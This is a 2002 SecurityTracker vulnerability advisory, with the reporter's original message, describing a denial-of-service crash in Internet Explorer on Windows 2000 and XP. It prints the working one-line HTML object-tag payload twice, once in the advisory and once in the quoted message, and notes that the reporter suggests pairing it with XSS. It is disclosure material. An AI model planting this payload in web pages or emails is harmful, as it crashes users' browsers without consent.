SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |    Help    |   

SecurityTracker
Archives


Welcome to SecurityTracker!
 
Click to Sign Up
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com
Questions?
Want to learn about SecurityTracker? We've got answers to frequently asked questions right here
Sign Up!





Category:  Application (Web Browser)  >  Internet Explorer (IE) Vendors:  Microsoft
Microsoft Internet Explorer Can Be Crashed By Malicious AVI Object in HTML
SecurityTracker Alert ID:  1004618
CVE Reference:  GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jun 25 2002
Impact:  Denial of service via network
Exploit Included:  Yes  
Description:  'ken'@FTU reported a denial of service vulnerability in Microsoft's Internet Explorer web browser. A remote user can create HTML that, when loaded by a target user, will cause the target user's browser to crash.

It is reported that the following line of AVI handler code in an HTML web page (or HTML-based e-mail) will cause IE to crash:

<!-- start dosIE-doe.html -->

<object ID="dosIE-doe"
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>

<!-- end dosIE-doe.html -->

The vendor has reportedly been notified.
Impact:  A malicious web page or HTML-based e-mail message can cause IE to crash.
Solution:  No solution was available at the time of this entry.

Microsoft reportedly does not classify this as a security vulnerability in accordance with their definitions:

http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:  Exception handling error
Underlying OS:  Windows (2000), Windows (XP)
Reported By:  "'ken'@FTU" <ken_at_ftu@yahoo.com>
Message History:   None.

 Source Message Contents
Date:  Mon, 24 Jun 2002 22:27:27 -0400
From:  "'ken'@FTU" <ken_at_ftu@yahoo.com>
Subject:  A DoS against IE in W2K and XP? You Make the Call...

 


The following line of code will crash IE when the OS is Windows 2000 or 
Windows XP.

<!--  start dosIE-doe.html -->

<object ID="dosIE-doe" 
CLASSID="CLSID:00022613-0000-0000-C000-000000000046" </object>

<!-- end dosIE-doe.html -->


I alerted Microsoft. They replied that it is not a security 
vulnerability according to their policy:

================= Begin MS reply ========================

"Suppose a flaw in a web browser could be misused by a web site to
"hang" the browser of any user who visited the site. If the user were
able to resume normal operation by stopping the browser, restarting it,
and avoiding the attacker's web site in the future, the flaw would not
constitute a security vulnerability."
(For the complete definition of a security vulnerability please see
http://www.microsoft.com/technet/treeview/default.asp?url=/TechNet/columns/security/vulnrbl.asp)

================= End MS reply ===========================


I am aware that this code is more an inconvenience that anything else. 
Although, if it were combined with another vulnerability its effect may 
be much worse. (Say a XSS vulnerability also exists and an attacker 
could crash the browser of every user that visits your ecommerce
site...)


'ken'@FTU



-- 
"I grew convinced that truth, sincerity and integrity in dealings 
between man and man were of the utmost importance to the felicity of 
life, and I formed a written resolution to practice them ever while I 
lived."
	-Benjamin Franklin, The Autobiography of Benjamin Franklin


Go to the Top of This SecurityTracker Archive Page



Home   |    View Topics   |    Search   |    Contact Us   |    Help

Copyright 2002, SecurityGlobal.net LLC